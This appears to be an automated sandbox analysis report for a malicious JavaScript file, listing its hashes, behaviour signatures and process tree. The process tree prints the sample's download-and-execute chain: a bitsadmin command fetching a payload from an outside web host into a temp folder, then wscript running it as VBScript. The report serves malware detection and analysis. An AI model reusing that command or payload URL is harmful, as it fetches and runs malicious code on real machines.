Analysis
-
max time kernel
135s -
max time network
140s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
29-08-2024 01:47
Static task
static1
Behavioral task
behavioral1
Sample
8ed7810c7c48d274f4b845cb155ab61af9ac0297fceb2f356ad5557434977b5a.js
Resource
win7-20240708-en
General
-
Target
8ed7810c7c48d274f4b845cb155ab61af9ac0297fceb2f356ad5557434977b5a.js
-
Size
441KB
-
MD5
c7e47553b94c0d18ecf9e03b5ffec68b
-
SHA1
bfb60db9ad9e0bd41ee2335acaa6316264c0b638
-
SHA256
8ed7810c7c48d274f4b845cb155ab61af9ac0297fceb2f356ad5557434977b5a
-
SHA512
5a624285b1d9179939495c0f2baa4ecfb7cc9561098977be825ab83b6c90d5e86b4571f5cfa603d9e5e2be76b8e84153a607f26b4263cbff908bb5aca2201194
-
SSDEEP
384:JeeeeeeeeeeeRReeeeeeeeeeeReeeeeeeeeeezeeeeeeeeeee8eeeeeeeeeeeRe4:Heo
Malware Config
Signatures
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-656926755-4116854191-210765258-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
wscript.exedescription pid process target process PID 4288 wrote to memory of 1776 4288 wscript.exe bitsadmin.exe PID 4288 wrote to memory of 1776 4288 wscript.exe bitsadmin.exe PID 4288 wrote to memory of 4408 4288 wscript.exe wscript.exe PID 4288 wrote to memory of 4408 4288 wscript.exe wscript.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\8ed7810c7c48d274f4b845cb155ab61af9ac0297fceb2f356ad5557434977b5a.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4288 -
C:\Windows\System32\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer 8 https://aeroox.000webhostapp.com/mes/010111100110101101001111111101011011100101011110 C:\Users\Admin\AppData\Local\Temp\pmqfgkdqzsbsvsamfrryrizflqdvvwqqctmqvepuyuplixbkjbforifcqtpxeylsnfsloatiuqykwi2⤵
- Download via BitsAdmin
PID:1776 -
C:\Windows\System32\wscript.exe"C:\Windows\System32\wscript.exe" //E:VBScript C:\Users\Admin\AppData\Local\Temp\pmqfgkdqzsbsvsamfrryrizflqdvvwqqctmqvepuyuplixbkjbforifcqtpxeylsnfsloatiuqykwi2⤵PID:4408